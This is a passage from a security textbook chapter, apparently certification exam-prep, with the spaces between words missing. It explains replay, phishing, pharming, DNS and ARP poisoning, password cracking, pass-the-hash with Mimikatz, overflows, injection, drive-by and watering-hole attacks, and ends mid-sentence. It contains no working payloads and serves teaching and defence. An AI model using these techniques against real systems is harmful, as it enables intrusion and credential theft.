CrossCheckEncryptionCryptographyandencryptionaretoolsthatcansolvemanyofoursecrecyproblems.Thechallengessolvedthroughencryptionandthenewproblemsassociatedwiththeuseofencryptionrequireanunderstandingofthetechnicaldetails.Publickeyencryption,discussedindetailinChapters5and6,usestwokeys:apublickey,whichanybodycanusetoencryptor“lock”yourmessage,andaprivatekey,whichonlyyouknowandwhichisusedto“unlock”ordecryptamessagelockedwithyourpublickey.Oneofthekeychallengesassociatedwiththeuseofpublickeysandcorrespondingprivatekeysisdeterminingwhohaswhatkeyvalues.Doyouhaveyourownkeypair?Ifso,doyouknowthepublickeyvaluethatyouneedtosharewithothers?
ReplayAttacksAreplayattackoccurswhentheattackercapturesaportionofacommunicationbetweentwopartiesandretransmitsitatalatertime.Forexample,anattackermightreplayaseriesofcommandsandcodesusedinafinancialtransactiontocausethetransactiontobeconductedmultipletimes.Generallyreplayattacksareassociatedwithattemptstocircumventauthenticationmechanisms,suchasthecapturingandreuseofacertificateorticket.
ExamTip:Thebestmethodfordefendingagainstreplayattacksisthroughtheuseofencryptionandshorttimeframesforlegaltransactions.Encryptioncanprotectthecontentsfrombeingunderstood,andashorttimeframeforatransactionpreventssubsequentuse.
Thebestwaytopreventreplayattacksiswithencryption,cryptographicauthentication,andtimestamps.Ifaportionofthecertificateorticketincludesadate/timestamporanexpirationdate/time,andthisportionisalsoencryptedaspartoftheticketorcertificate,replayingitatalatertimewillproveuseless,sinceitwillberejectedashavingexpired.
TransitiveAccessTransitiveaccessisameansofattackingasystembyviolatingthetrustrelationshipbetweenmachines.Asimpleexampleiswhenserversarewellprotectedandclientsarenot,andtheserverstrusttheclients.Inthiscase,attackingaclientcanprovidetransitiveaccesstotheservers.
ExamTip:Trustisanessentialpartofsecurity.IfBtrustsAandCtrustsB,thenCtrustsA.Atransitiveattacktakesadvantageofthistrustchainbyobtainingtrustfromoneelementinthechain(forexample,throughspoofing)andthenusingthattogaintransitiveaccesstoanothertrustedsystemviathechainoftrust.
SpamThoughnotgenerallyconsideredasocialengineeringissue,norasecurityissueforthatmatter,spamcan,however,beasecurityconcern.Spam,asjustabouteverybodyknows,isbulkunsolicitede-mail.Itcanbelegitimateinthesensethatithasbeensentbyacompanyadvertisingaproductorservice,butitcanalsobemaliciousandcouldincludeanattachmentthatcontainsmalicioussoftwaredesignedtoharmyoursystem,oralinktoamaliciouswebsitethatmayattempttoobtainpersonalinformationfromyou.
SpimThoughnotaswellknown,avariationonspamisspim,whichisbasicallyspamdeliveredviaaninstantmessagingapplicationsuchasYahoo!MessengerorAOLInstantMessenger(AIM).Thepurposeofhostilespimisthesameasthatofspam—thedeliveryofmaliciouscontentorlinks.
Phishing
Phishingistheuseoffraudulente-mailsorinstantmessagesthatappeartobegenuinebutaredesignedtotrickusers.Thegoalofaphishingattackistoobtainfromtheuserinformationthatcanbeusedinanattack,suchaslogincredentialsorothercriticalinformation.
TheAnti-PhishingWorkingGroup(APWG)is“anindustryassociationfocusedoneliminatingtheidentitytheftandfraudthatresultfromthegrowingproblemofphishingandemailspoofing.”APWGislocatedatwww.antiphishing.org.
SpearPhishingSpearphishingisthetermthathasbeencreatedtorefertoaphishingattackthattargetsaspecificgroupwithsomethingincommon.Bytargetingaspecificgroup,theratioofsuccessfulattacks(thatis,thenumberofresponsesreceived)tothetotalnumberofe-mailsormessagessentusuallyincreasesbecauseatargetedattackwillseemmoreplausiblethanamessagesenttousersrandomly.
VishingVishingisavariationofphishingthatusesvoicecommunicationtechnologytoobtaintheinformationtheattackerisseeking.Vishingtakesadvantageofthetrustthatsomepeopleplaceinthetelephonenetwork.Usersareunawarethatattackerscanspoof(simulate)callsfromlegitimateentitiesusingvoiceoverIP(VoIP)technology.Voicemessagingcanalsobecompromisedandusedintheseattempts.Generally,theattackersarehopingtoobtaincreditcardnumbersorotherinformationthatcanbeusedinidentitytheft.Theusermayreceiveane-mailaskinghimorhertocallanumberthatisansweredbyapotentiallycompromisedvoicemessagesystem.Usersmayalsoreceivearecordedmessagethatappearstocomefromalegitimateentity.Inbothcases,theuserwillbeencouragedtorespondquicklyandprovidethesensitiveinformationsothataccessto
theiraccountisnotblocked.Ifausereverreceivesamessagethatclaimstobefromareputableentityandasksforsensitiveinformation,theusershouldnotprovideitbutinsteadshouldusetheInternetorexaminealegitimateaccountstatementtofindaphonenumberthatcanbeusedtocontacttheentity.Theusercanthenverifythatthemessagereceivedwaslegitimateorreportthevishingattempt.
PharmingPharmingconsistsofmisdirectinguserstofakewebsitesthathavebeenmadetolookofficial.Usingphishing,individualsaretargetedonebyonebye-mails.Tobecomeavictim,therecipientmusttakeanaction(forexample,respondbyprovidingpersonalinformation).Inpharming,theuserwillbedirectedtothefakewebsiteasaresultofactivitysuchasDNSpoisoning(anattackthatchangesURLsinaserver’sdomainnametable)ormodificationoflocalhostfiles,whichareusedtoconvertURLstotheappropriateIPaddresses.Onceatthefakewebsite,theusermaysupplypersonalinformation,believingthattheyareconnectedtothelegitimatesite.Figure15.9illustrateshowpharmingoperates.ThefirststepisanattackerpoisonstheDNSsystem,sowhentheuserqueriesit(step2)theygetafalseaddress(step3).Thisresultsintheuserbeingdirectedtothefakewebsite(step4).
•Figure15.9Howpharmingworks
ScanningAttacksScannerscanbeusedtosendspecificallycraftedpacketsinanattempttodetermineTCP/UDPportstatus.AnXMASscan,namedbecausethe
alternatingbitsintheTCPheaderlooklikeChristmaslights,usestheURG,PSH,andFINflagstodetermineTCPportavailability.Iftheportisclosed,anRSTisreturned.Iftheportisopen,thereistypicallynoreturn.AnXMASscancanhelpdetermineOStypeandversion,baseduponTCP/IPstackresponses,andcanalsohelpdeterminefirewallrules.Theseattackscanalsobeusedtoconsumesystemresources,resultinginDoS.
TechTip
XMASAttackTheXMASattackorChristmasattackcomesfromaspecificsetofprotocoloptions.AChristmastreepacketisapacketthathasallofitsoptionsturnedon.ThenamecomesfromtheobservationthatthesepacketsarelituplikeaChristmastree.Whensentasascan,aChristmastreepackethastheFIN,URG,andPSHoptionsset.ManyOSsimplementtheircompliancewiththeRFCgoverningIPpackets,RFC791,inslightlydifferentmanners.TheirresponsetothepacketcantellthescannerwhattypeofOSispresent.AnotheroptionisinthecaseofaDoSattack,whereChristmaspacketscantakeupsignificantlygreaterprocessingonarouter,consumingresources.
SimplestatelessfirewallscheckfortheSYNflagsettopreventSYNfloods,andChristmaspacketsaredesignednottohaveSYNset,sotheypassrightbythesedevices.Newersecuritydevicessuchasadvancedfirewallscandetectthesepackets,alertingpeopletothescanningactivities.
AttacksonEncryptionEncryptionistheprocessoftransformingplaintextintoanunreadableformatknownasciphertextusingaspecifictechniqueoralgorithm.Mostencryptiontechniquesusesomeformofkeyintheencryptionprocess.Thekeyisusedinamathematicalprocesstoscrambletheoriginalmessagetoarriveattheunreadableciphertext.Anotherkey(sometimesthesameoneandsometimesadifferentone)isusedtodecryptorunscrambletheciphertexttore-createtheoriginalplaintext.Thelengthofthekeyoften
directlyrelatestothestrengthoftheencryption.Cryptanalysisistheprocessofattemptingtobreakacryptographic
system—itisanattackonthespecificmethodusedtoencrypttheplaintext.Cryptographicsystemscanbecompromisedinvariousways.
WeakKeysCertainencryptionalgorithmsmayhavespecifickeysthatyieldpoor,oreasilydecrypted,ciphertext.ImagineanencryptionalgorithmthatconsistssolelyofasingleXORfunction(anexclusiveORfunctionwheretwobitsarecomparedanda1isreturnedifeitheroftheoriginalbits,butnotboth,isa1),wherethekeyisrepeatedlyusedtoXORwiththeplaintext.Akeywhereallbitsare0’s,forexample,wouldresultinciphertextthatisthesameastheoriginalplaintext.Thiswouldobviouslybeaweakkeyforthisencryptionalgorithm.Infact,anykeywithlongstringsof0’swouldyieldportionsoftheciphertextthatwerethesameastheplaintext.Inthissimpleexample,manykeyscouldbeconsideredweak.Encryptionalgorithmsusedincomputersystemsandnetworksaremuch
morecomplicatedthanasimple,singleXORfunction,butsomealgorithmshavestillbeenfoundtohaveweakkeysthatmakecryptanalysiseasier.
CrossCheckCryptographyandEncryptionUnderstandingthebasicsofcryptographyisimportanttounderstandingvariousdefensesfrommalware.Ifyouarenotfamiliarwithencryption,decryption,hashes,andsignatures,itwouldbewisetoreviewthemnow.ThevariouselementsofcryptographyandencryptionarediscussedindetailinChapter5.
ExhaustiveSearchofKeySpaceEvenifthespecificalgorithmusedtoencryptamessageiscomplicatedandhasnotbeenshowntohaveweakkeys,thekeylengthwillstillplaya
significantroleinhoweasyitistoattackthemethodofencryption.Generallyspeaking,thelongerakey,theharderitwillbetoattack.Thus,a40-bitencryptionschemewillbeeasiertoattackusingabrute-forcetechnique(whichtestsallpossiblekeys,onebyone)thana256-bitbasedscheme.Thisiseasilydemonstratedbyimaginingaschemethatemploysa2-bitkey.Eveniftheresultingciphertextwerecompletelyunreadable,performingabrute-forceattackuntilonekeyisfoundthatcandecrypttheciphertextwouldnottakelong,sinceonlyfourkeysarepossible.Everybitthatisaddedtothelengthofakeydoublesthenumberofkeysthathavetobetestedinabrute-forceattackontheencryption.Itiseasytounderstandwhyaschemeutilizinga40-bitkeywouldbemucheasiertoattackthanaschemethatutilizesa256-bitkey.Thebottomlineissimple:anexhaustivesearchofthekeyspacewill
decryptthemessage.Thestrengthoftheencryptionmethodisrelatedtothesheersizeofthekeyspace,whichwithmodernalgorithmsislargeenoughtoprovidesignificanttimeconstraintswhenusingthismethodtobreakanencryptedmessage.Algorithmiccomplexityisalsoanissuewithrespecttobruteforce,andyoucannotimmediatelycomparedifferentkeylengthsfromdifferentalgorithmsandassumerelativestrength.
IndirectAttacksOneofthemostcommonwaysofattackinganencryptionsystemistofindweaknessesinmechanismssurroundingthecryptography.Examplesincludepoorrandom-numbergenerators,unprotectedkeyexchanges,keysstoredonharddriveswithoutsufficientprotection,andothergeneralprogrammaticerrors,suchasbufferoverflows.Inattacksthattargetthesetypesofweaknesses,itisnotthecryptographicalgorithmitselfthatisbeingattacked,butrathertheimplementationofthatalgorithmintherealworld.
AddressSystemAttacksManyaspectsofacomputersystemarecontrolledbytheuseofaddresses.
IPaddressescanbemanipulatedasshownearlier,andtheotheraddressschemescanbemanipulatedaswell.Inthesummerof2008,muchwasmadeofaseriousDomainNameSystem(DNS)vulnerabilitythatrequiredthesimultaneouspatchingofsystemsbyover80vendors.Thiscoordinatedeffortwastocloseatechnicalloopholeinthedomainnameresolutioninfrastructurethatwouldallowthehijackingandman-in-the-middleattackontheDNSsystemworldwide.
ExamTip:Theprocessofusinganewdomainnameforthefive-day“test”periodandthenrelinquishingthename,onlytorepeattheprocessagain—inessence,obtainingadomainnameforfree—iscalledDNSkiting.
TheDNSsystemhasbeenthetargetofotherattacks.Oneattack,DNSkiting,isaneconomicattackagainstthetermsofusinganewDNSentry.NewDNSpurchasesareallowedafive-day“testperiod”duringwhichthenamecanberelinquishedfornofee.Creativeuserslearnedtoregisteraname,useitforlessthanfivedays,relinquishthename,andthengetthenameandbeginallover,repeatingthiscyclemanytimestouseanamewithoutpayingforit.Typicalregistrationversuspermanententryratiosof15:1occur,andinFebruary2007GoDaddyreportedthatoutof55.1millionrequestsonly3.6millionwerenotcanceled.Anothertwistonthisschemeistheconceptofdomainnamefront
running,wherearegistrarplacesanameonafive-dayholdaftersomeonesearchesforit,andthenoffersitforsaleatahigherprice.InJanuary2008,NetworkSolutionswasaccusedofviolatingthetrustasaregistrarbyforcingpeopletopurchasenamesfromthemaftertheyengagedindomainnametesting.
CachePoisoningManynetworkactivitiesrelyuponvariousaddressingschemestofunction
properly.Whenyoupointyourwebbrowseratyourbank,bytypingthebank’sURL,yourbrowserconsultsthesystem’sDNSsystemtoturnthewordsintoanumericaladdress.Whenapacketisbeingswitchedtoyourmachinebythenetwork,aseriesofaddresscachesisinvolved.WhetherthecacheisfortheDNSsystemortheARPsystem,itexistsforthesamereason:efficiency.Thesecachespreventrepeatedredundantlookups,savingtimeforthesystem.Buttheycanalsobepoisoned,sendingincorrectinformationtotheenduser’sapplication,redirectingtraffic,andchangingsystembehaviors.
ExamTip:Understandinghowhijackingattacksareperformedthroughpoisoningtheaddressingmechanismsisimportantfortheexam.
DNSPoisoningTheDNSsystemisusedtoconvertanameintoanIPaddress.ThereisnotasingleDNSsystem,butratherahierarchyofDNSservers,fromrootserversonthebackboneoftheInternet,tocopiesatyourISP,yourhomerouter,andyourlocalmachine,eachintheformofaDNScache.ToexamineaDNSqueryforaspecificaddress,youcanusethenslookupcommand.Figure15.10showsaseriesofDNSqueriesexecutedonaWindowsmachine.Inthefirstrequest,theDNSserverwaswithanISP,whileonthesecondrequest,theDNSserverwasfromaVPNconnection.Betweenthetworequests,thenetworkconnectionswerechanged,resultingindifferentDNSlookups.ThisisaformofDNSpoisoningattack.
•Figure15.10nslookupofaDNSquery
Attimes,nslookupwillreturnanonauthoritativeanswer,asshowninFigure15.11.Thistypicallymeanstheresultisfromacacheasopposedtoaserverthathasanauthoritative(thatis,knowntobecurrent)answer.
•Figure15.11CacheresponsetoaDNSquery
ThereareothercommandsyoucanusetoexamineandmanipulatetheDNScacheonasystem.InWindows,theipconfig/displaydnscommandwillshowthecurrentDNScacheonamachine.Figure15.12showsasmallDNScache.Thiscachewasrecentlyemptiedusingtheipconfig/flushdnscommandtomakeitfitonthescreen.
•Figure15.12CacheresponsetoaDNStablequery
LookingatDNSasacompletesystemshowsthattherearehierarchicallevelsfromthetop(rootserver)downtothecacheinanindividualmachine.DNSpoisoningcanoccuratanyoftheselevels,withtheeffectofthepoisoninggrowingwiderthehigherupitoccurs.In2010,aDNSpoisoningeventresultedinthe“GreatFirewallofChina”censoringinboundInternettrafficintoChinafromtheUnitedStatesuntilcacheswereresolved.Today,afterfurtherexamination,theattackwasshowntobemuchmorecomplex.TheeffortoftheChinesegovernmentactivelyseekstostrictlycontrolallaspectsofInternettrafficinChina.
DNSpoisoningisavariantofalargerattackclassreferredtoasDNSspoofing,inwhichanattackerchangesaDNSrecordthroughanyofamultitudeofmeans.TherearemanywaystoperformDNSspoofing,afewofwhichincludecompromisingaDNSserver,theuseoftheKaminskyattack,andtheuseofafalsenetworknodeadvertisingafalseDNSaddress.AnattackercanevenuseDNScachepoisoningtoresultinDNSspoofing.BypoisoninganupstreamDNScache,allofthedownstreamuserswillgetspoofedDNSrecords.BecauseoftheimportanceofintegrityonDNSrequestsandresponses,
aprojecthasbeguntosecuretheDNSinfrastructureusingdigitalsigningofDNSrecords.Thisproject,initiatedbytheU.S.governmentandcalledDomainNameSystemSecurityExtensions(DNSSEC),worksbydigitallysigningrecords.ThisisdonebyaddingrecordstotheDNSsystem,akeyandasignatureattestingtothevalidityofthekey.Withthisinformation,requestorscanbeassuredthattheinformationtheyreceiveiscorrect.Itwilltakeasubstantialamountoftime(years)forthisnewsystemtopropagatethroughtheentireDNSinfrastructure,butintheend,thesystemwillhavemuchgreaterassurance.
ARPPoisoningInmovingpacketsbetweenmachines,adevicesometimesneedstoknowwheretosendapacketusingtheMACorLayer2address.AddressResolutionProtocol(ARP)handlesthisproblemthroughfourbasicmessagetypes:
ARPrequest“WhohasthisIPaddress?”ARPreply“IhavethatIPaddress;myMACaddressis…”ReverseARPrequest(RARP)“WhohasthisMACaddress?”RARPreply“IhavethatMACaddress;myIPaddressis…”
Thesemessagesareusedinconjunctionwithadevice’sARPtable,whereaformofshort-termmemoryassociatedwiththesedataelements
resides.Thecommandsareusedasasimpleformoflookup.WhenamachinesendsanARPrequesttothenetwork,thereplyisreceivedandenteredintoalldevicesthathearthereply.Thisfacilitatesefficientaddresslookups,butalsomakesthesystemsubjecttoattack.WhentheARPtablegetsareply,itautomaticallytruststhereplyand
updatesthetable.SomeoperatingsystemswillevenacceptARPreplydataiftheyneverheardtheoriginalrequest.Thereisnomechanismtoverifytheveracityofthedatareceived.Anattackercansendmessages,corrupttheARPtable,andcausepacketstobemisrouted.ThisformofattackiscalledARPpoisoningandresultsinmaliciousaddressredirection,Thiscanallowamechanismwherebyanattackercaninjectthemselvesintothemiddleofaconversationbetweentwomachines,aman-in-the-middleattack.
ExamTip:ARPpoisoningisthealteringoftheARPcacheonthelocalsystem.
LocalMACaddressescanalsobepoisonedinthesamemanner,althoughitiscalledARPpoisoning.Thiscancausemiscommunicationslocally.Poisoningattackscanbeusedtostealinformation,establishman-in-the-middleattacks,andevencreateDoSopportunities.
PasswordGuessingThemostcommonformofauthenticationistheuserIDandpasswordcombination.Whileitisnotinherentlyapoormechanismforauthentication,thecombinationcanbeattackedinseveralways.Alltoooften,theseattacksyieldfavorableresultsfortheattackernotasaresultofaweaknessintheschemebutusuallyduetotheusernotfollowinggoodpasswordprocedures.
PoorPasswordChoicesTheleasttechnicalofthevariouspassword-attacktechniquesconsistsoftheattackersimplyattemptingtoguessthepasswordofanauthorizeduserofthesystemornetwork.Itissurprisinghowoftenthissimplemethodworks,andthereasonitdoesisbecausepeoplearenotoriousforpickingpoorpasswords.Usersneedtoselectapasswordthattheycanremember,sotheycreatesimplepasswords,suchastheirbirthday,theirmother’smaidenname,thenameoftheirspouseoroneoftheirchildren,orevensimplytheiruserIDitself.AllittakesisfortheattackertoobtainavaliduserID(oftenasimplematter,becauseorganizationstendtouseanindividual’snamesinsomecombination—firstletteroftheirfirstnamecombinedwiththeirlastname,forexample)andalittlebitofinformationabouttheuserbeforeguessingcanbegin.
DictionaryAttackAnothermethodofdeterminingpasswordsistouseapassword-crackingprogramthatusesalistofdictionarywordstotrytoguessthepassword.Thedictionarywordscanbeusedbythemselves,ortwoormoresmallerwordscanbecombinedtoformasinglepossiblepassword.Anumberofcommercialandpublic-domainpassword-crackingprogramsemployavarietyofmethodstocrackpasswords,includingusingvariationsontheuserID.Rulescanalsobedefinedsothatthecrackingprogramwillsubstitute
specialcharactersforothercharactersorcombinewords.Theabilityoftheattackertocrackpasswordsisdirectlyrelatedtothemethodtheuseremploystocreatethepasswordinthefirstplace,aswellasthedictionaryandrulesused.
Brute-ForceAttackIftheuserhasselectedapasswordthatisnotfoundinadictionary,evenifsimplybysubstitutingvariousnumbersorspecialcharactersforletters,theonlywaythepasswordcanbecrackedisforanattackertoattemptabrute-
forceattack,inwhichthepassword-crackingprogramattemptsallpossiblecharactercombinations.Thelengthofthepasswordandthesizeofthesetofpossiblecharacters
inthepasswordwillgreatlyaffectthetimeabrute-forceattackwilltake.Afewyearsago,thismethodofattackwasverytimeconsuming,sinceittookconsiderabletimetogenerateallpossiblecombinations.Withtheincreaseincomputerspeed,however,generatingpasswordcombinationsismuchfaster,makingitmorefeasibletolaunchbrute-forceattacksagainstcertaincomputersystemsandnetworks.
Modernmulticoreprocessorsandlargeon-chipcachememorieshavesignificantlyimprovedthespeedofpassword-crackingprograms,makingbrute-forcemethodspracticalinmanycases.
Abrute-forceattackonapasswordcantakeplaceattwolevels:Theattackercanuseapassword-crackingprogramtoattempttoguessthepassworddirectlyataloginprompt,ortheattackercanfirststealapasswordfile,useapassword-crackingprogramtocompilealistofpossiblepasswordsbasedonthelistofpasswordhashescontainedinthepasswordfile(offline),andthenusethatnarrowerlisttoattempttoguessthepasswordattheloginprompt.Thefirstattackcanbemademoredifficultiftheaccountlocksafterafewfailedloginattempts.Thesecondattackcanbethwartedifthepasswordfileissecurelymaintainedsothatotherscannotobtainacopyofit.
TechTip
OfflinePasswordAttacksBecauseanattackerwhoobtainsapasswordfilehasunlimitedtimeofflinetopreparefortheonlineattack,andcanpreparewithouttippingoffthetarget,allpasswordsshouldbeconsideredtobevulnerableoverextendedperiodsoftime.Forthisreason,evenbatch
passwords(usedforsystem-runbatchjobs)shouldbechangedperiodicallytopreventofflineattacks.
HybridAttackAhybridpasswordattackisanattackthatcombinestheprecedingdictionaryandbrute-forcemethods.Mostcrackingtoolshavethisoptionbuiltin,firstattemptingadictionaryattack,andthenmovingtobrute-forcemethods.Theprogramsoftenpermittheattackertocreatevariousrulesthattell
theprogramhowtocombinewordstoformnewpossiblepasswords.Userscommonlysubstitutecertainnumbersforspecificletters.Iftheuserwantedtousethewordsecretasabaseforapassword,forexample,shecouldreplacetheletterewiththenumber3,yieldings3cr3t.Thispasswordwillnotbefoundinthedictionary,soapuredictionaryattackwouldnotcrackit,butthepasswordisstilleasyfortheusertoremember.Iftheattackercreatedarulethatinstructedtheprogramtotryallwordsinthedictionaryandthentrythesamewordssubstitutingthenumber3forthelettere,however,thepasswordwouldbecracked.
BirthdayAttackThebirthdayattackisaspecialtypeofbrute-forceattackthatgetsitsnamefromsomethingknownasthebirthdayparadox,whichstatesthatinagroupofatleast23people,thechancethattwoindividualswillhavethesamebirthdayisgreaterthan50percent.Mathematically,theequationis1.25×k1/2,wherekequalsthesizeofthesetofpossiblevalues,whichinthebirthdayparadoxis365(thenumberofpossiblebirthdays).Thissamephenomenonappliestopasswords,withk(numberofpasswords)beingquiteabitlarger.
Pass-the-HashAttacksPassthehashisahackingtechniquewheretheattackercapturesthehash
usedtoauthenticateaprocess.Theycanthenusethishash,byinjectingitintoaprocessinplaceofthepassword.Thisisahighlytechnicalattack,targetingtheWindowsauthenticationprocess,injectingacopyofthepasswordhashdirectlyintothesystem.Theattackerdoesnotneedtoknowthepassword,butinsteadcanuseacapturedhashandinjectitdirectly,whichwillverifycorrectly,grantingaccess.Asthisisaverytechnicallyspecifichack,toolshavebeendevelopedtofacilitateitsoperation.
TechTip
MimikatzMimikatzisatoolsetthatcanprovideinsightandexplorationintoWindowssecurityelements,includingobtainingKerberoscredentialsandcreatinga“goldenticket,”auniversalKerberosticket.MimikatzhasbeenincludedinMetasploit,makingthisanawesomepost-exploitationtoolthatcanenabletremendousattackerfunctionalityonaWindowsmachine.
SoftwareExploitationAnattackthattakesadvantageofbugsorweaknessesinsoftwareisreferredtoassoftwareexploitation.Thesebugsandweaknessescanbetheresultofpoordesign,poortesting,orpoorcodingpractices.Theycanalsoresultfromwhataresometimescalled“features.”Anexampleofthismightbeadebuggingfeature,whichwhenusedduringdebuggingmightallowunauthenticatedindividualstoexecuteprogramsonasystem.Ifthisfeatureremainsintheprogramwhenthefinalversionofthesoftwareisshipped,itcreatesaweaknessthatisjustwaitingtobeexploited.Softwareexploitationisapreventableproblem.Throughtheuseofa
securedevelopmentlifecycleprocess,coupledwithtoolssuchasthreatmodeling,bugtracking,fuzzing,andautomatedcodeanalysis,manyofexploitableelementscanbeidentifiedandcorrectedbeforerelease.Fuzzingistheautomatedprocessofapplyinglargesetsofinputstoasystemandanalyzingtheoutputtodetermineexploitableweaknesses.This
techniquehasbeenusedbyhackerstodetermineexploitableissuesandisbeingadoptedbysavvytestteams.Identificationofpotentialvulnerabilitiesbythetestingteamisthebestdefenseagainstzero-dayattacks,whichareattacksagainstcurrentlyunknownvulnerabilities.Anotherelementthatcanbeexploitedistheerrormessagesfroman
application.Goodprogrammingpracticeincludespropererrorandexceptionhandling.Propererrorhandlingwithrespecttothetestingteamincludesthereturnofsignificantdiagnosticinformationtoenabletroubleshooting.Oncethecodegoestoproduction,thediagnosticinformationisnotasimportantasitdoesnothelpendusers,andanypotentialinformationthatcanassistanattackershouldbeblockedfrombeingpresentedtotheenduser.AprimeexampleofthisisinSQLinjectionattacks,where,throughcleverlycraftedinjects,adatabasecanbemappedandthedatacanevenbereturnedtoanattacker.
Buffer-OverflowAttackAcommonweaknessthathasoftenbeenexploitedisabufferoverflow,whichoccurswhenaprogramisprovidedmoredataforinputthanitwasdesignedtohandle.Forexample,whatwouldhappenifaprogramthatasksfora7-to10-characterphonenumberinsteadreceivesastringof150characters?Manyprogramswillprovidesomeerrorcheckingtoensurethatthiswillnotcauseaproblem.Someprograms,however,cannothandlethiserror,andtheextracharacterscontinuetofillmemory,overwritingotherportionsoftheprogram.Thiscanresultinanumberofproblems,includingcausingtheprogramtoabortorthesystemtocrash.Undercertaincircumstances,theprogramcanexecuteacommandsuppliedbytheattacker.Bufferoverflowstypicallyinheritthelevelofprivilegeenjoyedbytheprogrambeingexploited.Thisiswhyprogramsthatuseroot-levelaccessaresodangerouswhenexploitedwithabufferoverflow,asthecodethatwillexecutedoessoatroot-levelaccess.
ExamTip:Bufferoverflowswereoneofthemostcommonvulnerabilitiesoverthepasttenyears,althoughawarenessandeffortstoeradicatethemoverthepastcoupleofyearshasbeenverysuccessfulinnewcode.
IntegerOverflowAnintegeroverflowisaprogrammingerrorconditionthatoccurswhenaprogramattemptstostoreanumericvalue,aninteger,inavariablethatistoosmalltoholdit.Theresultsvarybylanguageandnumerictype.Insomecases,thevaluesaturatesthevariable,assumingthemaximumvalueforthedefinedtypeandnomore.Inothercases,especiallywithsignedintegers,itcanrolloverintoanegativevalue,asthemostsignificantbitisusuallyreservedforthesignofthenumber.Thiscancreatesignificantlogicerrorsinaprogram.Integeroverflowsareeasilytestedfor,andstaticcodeanalyzerscan
pointoutwheretheyarelikelytooccur.Giventhis,therearenotanygoodexcusesforhavingtheseerrorsendupinproductioncode.
Client-SideAttacksThewebbrowserhasbecomethemajorapplicationforuserstoengageresourcesacrosstheWeb.Thepopularityandtheutilityofthisinterfacehasmadeitaprimetargetforattackerstogainaccessandcontroloverasystem.Awidevarietyofattackscanoccurviaabrowser,typicallyresultingfromafailuretovalidateinputproperlybeforeuse.Unvalidatedinputcanresultinaseriesofinjectionattacks,headermanipulation,andotherformsofattack.
TechTip
AllInputIsEvilYoucannevertrustinputfromaclientmachine.Aclientcanmanipulatetheinput,itcanbechangedintransit,andsimpletransmissionerrorscanoccur.Thenetresultisthatinputscanbemanipulated,spoofed,orotherwisechanged.Thebottomlineisnevertrustinput—alwaysverifyitbeforeuse.
InjectionAttacksWhenuserinputisusedwithoutinputvalidation,thisgivesanattackertheopportunitytocraftinputtocreatespecificeventstooccurwhentheinputisparsedandusedbyanapplication.SQLinjectionattacksinvolvethemanipulationofinput,resultinginaSQLstatementthatisdifferentthanintendedbythedesigner.XMLandLDAPinjectionsaredoneinthesamefashion.AsSQL,XML,andLDAPareusedtostoredata,thesetypesofinjectionattackscangiveanattackeraccesstodataagainstbusinessrules.Commandinjectionattackscanoccurwheninputisusedinafashionthatallowscommand-linemanipulation,givinganattackercommand-lineaccessatthesameprivilegelevelastheapplication.
HeaderManipulationsWhenHTTPisbeingdynamicallygeneratedthroughtheuseofuserinputs,unvalidatedinputscangiveattackersanopportunitytochangeHTTPelements.Whenuser-suppliedinformationisusedinaheader,itispossibletodeployavarietyofattacks,includingcachepoisoning,cross-sitescripting,cross-userdefacement,pagehijacking,cookiemanipulation,andopenredirect.
TypoSquatting/URLHijackingTyposquattingisanattackformthatinvolvescapitalizinguponcommontypoerrors.IfausermistypesaURL,thentheresultshouldbea404error,or“resourcenotfound.”ButifanattackerhasregisteredthemistypedURL,thenyouwouldlandontheattacker’spage.ThisattackpatternisalsoreferredtoasURLhijacking,fakeURL,orbrandjackingifthe
objectiveistodeceivebasedonbranding.Thereareseveralreasonsthatanattackerwillpursuethisavenueof
attack.Themostobviousisoneofaphishingattack.Thefakesitecollectscredentials,passingthemontotherealsite,andthenstepsoutoftheconversationtoavoiddetectiononcethecredentialsareobtained.Itcanalsobeusedtoplantdrive-bymalwareonthevictimmachine.Itcanmovethepacketsthroughanaffiliatenetwork,earningclick-throughrevenuebasedonthetypos.TherearenumerousotherformsofattacksthatcanbeperpetratedusingafakeURLasastartingpoint.
Drive-byDownloadAttacksBrowsersareusedtonavigatetheInternet,usingHTTPandotherprotocolstobringfilestousers’computers.Someofthesefilesareimages,somearescripts,andsomearetextbased,andtogethertheyformthewebpagesthatwesee.Usersdon’taskforeachcomponent—itisthejobofthebrowsertoidentifytheneededfilesandfetchthem.Anewtypeofattacktakesadvantageofthismechanismbyinitiatingdownloadsofmalware,whetherauserclicksitornot.Thisautomateddownloadofmaterialsisreferredtoasadrive-bydownloadattack.
ExamTip:Drive-bydownloadscanoccurfromacoupleofdifferentmechanisms.Itispossibleforanadthatisrotatedintocontentonareputablesitetocontainadrive-bydownload.Usersdon’thavecontroloverwhatadsarepresented.Asecond,morecommonmethodisawebsitethattheusergetstoeitherbymistypingaURLorbyfollowingasearchlinkwithoutvettingwheretheyareclickingfirst.Justlikecitiescanhavebadneighborhoods,sotoodoestheInternet,andsurfinginabadneighborhoodcanresultinbadoutcomes.
WateringHoleAttackThemostcommonlyrecognizedattackvectorsarethosethataredirecttoatarget.Becauseoftheirincominganddirectnature,defensesarecraftedtodetectanddefendagainstthem.Butwhatiftheuser“asked”fortheattack
byvisitingawebsite?Justasahunterwaitsnearawateringholeforanimalstocomedrink,attackerscanplantmalwareatsiteswhereusersarelikelytofrequent.FirstidentifiedbyRSA,wateringholeattacksinvolvetheinfectingofatargetwebsitewithmalware.Insomeofthecasesdetected,theinfectionwasconstrainedtoaspecificgeographicalarea.Thesearenotsimpleattacks,yettheycanbeveryeffectiveatdeliveringmalwaretospecificgroupsofendusers.Wateringholeattacksarecomplextoachieveandappeartobebackedbynation-statesandotherhigh-resourceattackers.Inlightofthestakes,thetypicalattackvectorwillbeazero-dayattacktofurtheravoiddetection.
TechTip
WateringHoleAttacksWateringholeattackscanoccurfromeveninnocentwebsites.BrianKrebsgivesastronganalysisofwateringholeattacksonhisblog,KrebsonSecurity:http://krebsonsecurity.com/2012/09/espionage-hackers-target-watering-hole-sites.
AdvancedPersistentThreatTheadvancedpersistentthreat(APT)isamethodofattackthatprimarilyfocusesonstealthandcontinuouspresenceonasystem.APTisaveryadvancedmethod,requiringateamtomaintainaccessandtypicallyinvolveshigh-valuetargets.APTtypicallyinvolvesspeciallycraftedattackvectors,coupledwithphishingorspearphishingfortheinitialentry.Thentechniquesareemployedtodevelopbackdoorsandmultipleaccountaccessroutes.Theskillleveloftheattackersistypicallyexceedinglyhighandtheiraimistocompletelyownasystemwithoutbeingdetected.Oncetheattackershavecompletelypenetratedasystem,including
